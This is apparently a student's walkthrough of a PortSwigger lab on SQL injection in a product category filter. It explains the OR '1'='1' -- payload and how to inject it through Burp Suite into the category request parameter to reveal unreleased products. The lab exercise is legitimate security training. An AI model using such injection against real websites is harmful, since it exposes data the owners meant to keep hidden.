Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
Last updated
Last updated
This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following:
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
To solve the lab, perform a SQL injection attack that causes the application to display one or more unreleased products.
First thing first, press the 'ACCESS THE LAB' button.
We got a website provided by PortSwigger.
Our task is that, we need to make this page show us its hidden products. and,
The SQL Query above is the example condition of the displaying products right now. But the trick is that, if we just think and changed a bit of the query, we can easily break into it, or make it serves us as we want.
i.e. In this case we want the page to show us all of the hidden products from any categories. We could change the above query to:
As you can see above, I removed the 'Gifts' in category, and added the OR '1'='1' -- in between the code before the AND part.
The concept of the code above:
We don't consider specific category.
OR '1'='1': 1 always equals to 1 means that this is a TRUE statement, and also TRUE OR <anything> equals to TRUE.
This trick of query is beneficial to bypassing through most of the things.
Edit: In our case: OR 1=1 always evaluates to true, so the WHERE clause is effectively bypassed, returning all rows.
--: The '--' works as a comment in sql query. Means that the query after the '--' won't be executed.
Enough of the theory, let's see on the practical attempt.
Okay, now we're going to try to exploit this web page.
1.) Change the proxy server to BURP SUITE. In my case, I'll just change it with my foxyproxy.
2.) In the burp suite, make sure to turn the "Intercept mode" on.
3.) Now let's try clicking one category on the web page. In this case, I'll click on "Accessories". Be ready to take a look at burp suite's event log.
As you can see here, this is the request log from the client to web server.
On the first line you will see that it send GET /filter?category=Accessories to the webserver.
This is where we'll be playing with.
We'll exploit the SQL injection into the web server as we'll change the request GET into:
Now, click forward to see the response from the web server.
But it still unsolved yet. What did I do wrong ? [10 pts.]
.
.
.
Actually, I did solved it already. But I didn't forward all the way through to the end. As I tried clicking the the category again, it pops up that I solved the lab already. That's why I assume it was because of the forward.
Anyway, We solved it :)
